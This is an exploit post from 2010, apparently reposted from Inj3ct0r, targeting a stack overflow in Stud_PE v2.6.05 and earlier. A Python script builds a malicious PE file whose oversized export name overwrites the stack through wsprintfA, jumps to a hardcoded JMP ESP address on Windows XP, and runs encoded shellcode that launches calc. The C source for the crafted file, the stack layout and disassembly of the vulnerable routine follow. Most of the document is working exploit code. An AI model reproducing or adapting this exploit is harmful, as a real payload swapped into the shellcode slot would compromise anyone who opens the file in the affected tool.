Stud_PE <= v2.6.05 Stack Overflow PoC exploit
Posted on 28 March 2010
============================================= Stud_PE <= v2.6.05 Stack Overflow PoC exploit ============================================= ################################################################### # Exploit Title: Stud_PE <= v2.6.05 Stack Overflow PoC exploit # Date: 03/28/2010 # Author: zha0 # Software Link: http://www.cgsoftlabs.ro/studpe.html # Version: Stud_PE <= v2.6.05 # Tested on: Windows XP SP3 CHT # CVE : # Code : # Greetz to : nanika, Catherine & chr00t team ################################################################### #!/usr/bin/python pe_exe=( "x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00" "xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00xB0x00x00x00" "x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68" "x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F" "x74x20x62x65x20x72x75x6Ex20x69x6Ex20x44x4Fx53x20" "x6Dx6Fx64x65x2Ex0Dx0Dx0Ax24x00x00x00x00x00x00x00" "xCFxA3x03xDBx8BxC2x6Dx88x8BxC2x6Dx88x8BxC2x6Dx88" "xBDxE4x66x88x8AxC2x6Dx88x74xE2x69x88x8AxC2x6Dx88" "x52x69x63x68x8BxC2x6Dx88x00x00x00x00x00x00x00x00" "x50x45x00x00x4Cx01x01x00x75xCExAEx4Bx00x00x00x00" "x00x00x00x00xE0x00x0Fx01x0Bx01x06x00x00x02x00x00" "x00x00x00x00x00x00x00x00x01x10x00x00x00x10x00x00" "x00x20x00x00x00x00x40x00x00x10x00x00x00x02x00x00" "x04x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00" "x00x20x00x00x00x02x00x00x00x00x00x00x02x00x00x00" "x00x00x10x00x00x10x00x00x00x00x10x00x00x10x00x00" "x00x00x00x00x10x00x00x00x10x10x00x00x47x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x2Ex74x65x78x74x00x00x00" "x57x00x00x00x00x10x00x00x00x02x00x00x00x02x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x20x00x00x60" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "xC3xC3x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x75xCExAEx4Bx00x00x00x00x42x10x00x00" "x01x00x00x00x01x00x00x00x01x00x00x00x38x10x00x00" "x3Cx10x00x00x40x10x00x00x00x10x00x00x52x10x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75" "x31x31x31x31x32x32x32x32x33x33x33x33xCEx24xFAx7F" # 0x7FFA24CE JMP ESP Windows XP CHT SP2,SP3 "x90xEBx0Fx5Ex8BxFEx33xC9xB1x7CxACx34x87xAAxE2xFA" # Shellcode : 146 bytes, WinExec("calc"); ExitProcess(0); "xEBx05xE8xECxFFxFFxFFx6Fx8Fx87x87x87x1Fx79x0Dx89" "xF9x5Fx65xF4xDFxD7xD7xEDx85xDExD8xE0xE3x26xB7x87" "x0CxC7x8Bx0CxF7x9Bx2Ax0CxEFx8FxD6x0CxF2xBBx0CxF3" "xA9xFFx84x72xD1x0CxF1xA7x84x72xB4x4ExCExC6x2Ax84" "x42xB4x5Cx88x39x97xBFx75xF3x8Fx46x4Cx8Ax84x5DxC7" "x6Cx76xBCx98xF2x60xD9x0CxD9xA3x84x5AxE1x0Cx8BxCC" "x0CxD9x9Bx84x5Ax0Cx83x0Cx84x42x2CxDEx65x3BxDAxED" "x87x6Fx82x87x87x87xE4xE6xEBxE4x87x78xD2x87xEDx87" "x78xD2x83x00x00x00x00x00x00x00x00x00x00x00x00x00" ) try: rap = open("shu.exe",'wb') rap.write(pe_exe) rap.close() print "Exploit file created! " except: print "Error occured!" # ---------------------------------------- ca.c Source --------------------------------------------------------------- # // cl ca.c # #include <windows.h> # # #pragma comment(linker, "/ENTRY:WinMain") # #pragma comment(linker, "/ALIGN:4096 /FILEALIGN:512") # #pragma comment(linker, "/merge:.rdata=.text") # #pragma optimize("gsy", on) # # extern "C" __declspec (dllexport) void junkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkju111122223333444455555(void){} # # int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { return 0; } # # ---------------------------------------- Stack --------------------------------------------------------------------- # 0012F5BC # .... # .... 100h = 256 bytes # .... (contains string " rva: %08X ord: %1d" ..) # .... # 0012F6BC 0012F6EC Pointer to next SEH record # 0012F6C0 00484171 SE handler # 0012F6C4 FFFFFFFF # 0012F6C8 00407C45 RETURN to Stud_PE.00407C45 from Stud_PE.0042F070 # # ---------------------------------------- Stud_PE Code -------------------------------------------------------------- # sub_42F070 # ..... # 0042F4E9 |> B9 40000000 |MOV ECX,40 ; 40*sizeof(DWORD) # 0042F4EE |. 33C0 |XOR EAX,EAX # 0042F4F0 |. 8DBC24 58020000 |LEA EDI,DWORD PTR SS:[ESP+258] # 0042F4F7 |. F3:AB |REP STOS DWORD PTR ES:[EDI] # # 0042F4F9 |. 8B4424 1C |MOV EAX,DWORD PTR SS:[ESP+1C] # 0042F4FD |. 8B0CB0 |MOV ECX,DWORD PTR DS:[EAX+ESI*4] # 0042F500 |. 51 |PUSH ECX # 0042F501 |. 8D8C24 30010000 |LEA ECX,DWORD PTR SS:[ESP+130] # 0042F508 |. E8 A3AFFFFF |CALL Stud_PE.0042A4B0 # # // Copy the export name to stack # 0042F50D |. 50 |PUSH EAX ; /<%s> # 0042F50E |. 8D9424 5C020000 |LEA EDX,DWORD PTR SS:[ESP+25C] ; | # 0042F515 |. 68 40B44A00 |PUSH Stud_PE.004AB440 ; |Format = " %s " # 0042F51A |. 52 |PUSH EDX ; |s # 0042F51B |. FF15 74864800 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; wsprintfA # 0042F521 |. 83C4 0C |ADD ESP,0C # 0042F524 |> 3B75 18 |CMP ESI,[ARG.5] # 0042F527 |. 75 1B |JNZ SHORT Stud_PE.0042F544 # # 0042F529 |. 68 38B44A00 |PUSH Stud_PE.004AB438 ; /<%s> = "No name" # 0042F52E |. 8D8424 5C020000 |LEA EAX,DWORD PTR SS:[ESP+25C] ; | # 0042F535 |. 68 40B44A00 |PUSH Stud_PE.004AB440 ; |Format = " %s " # 0042F53A |. 50 |PUSH EAX ; |s # 0042F53B |. FF15 74864800 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; wsprintfA # 0042F541 |. 83C4 0C |ADD ESP,0C # # 0042F544 |> 8D7C24 2C |LEA EDI,DWORD PTR SS:[ESP+2C] # 0042F548 |. 83C9 FF |OR ECX,FFFFFFFF # 0042F54B |. 33C0 |XOR EAX,EAX # 0042F54D |. 8D9424 58020000 |LEA EDX,DWORD PTR SS:[ESP+258] # 0042F554 |. F2:AE |REPNE SCAS BYTE PTR ES:[EDI] # 0042F556 |. F7D1 |NOT ECX # 0042F558 |. 2BF9 |SUB EDI,ECX # 0042F55A |. 50 |PUSH EAX ; /Arg9 => 00000000 # 0042F55B |. 8BF7 |MOV ESI,EDI ; | # 0042F55D |. 8BFA |MOV EDI,EDX ; | # 0042F55F |. 8BD1 |MOV EDX,ECX ; | # 0042F561 |. 83C9 FF |OR ECX,FFFFFFFF ; | # 0042F564 |. F2:AE |REPNE SCAS BYTE PTR ES:[EDI] ; | # 0042F566 |. 8BCA |MOV ECX,EDX ; | # 0042F568 |. 4F |DEC EDI ; | # 0042F569 |. C1E9 02 |SHR ECX,2 ; | # 0042F56C |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; | # ........... # # Inj3ct0r.com [2010-03-28]
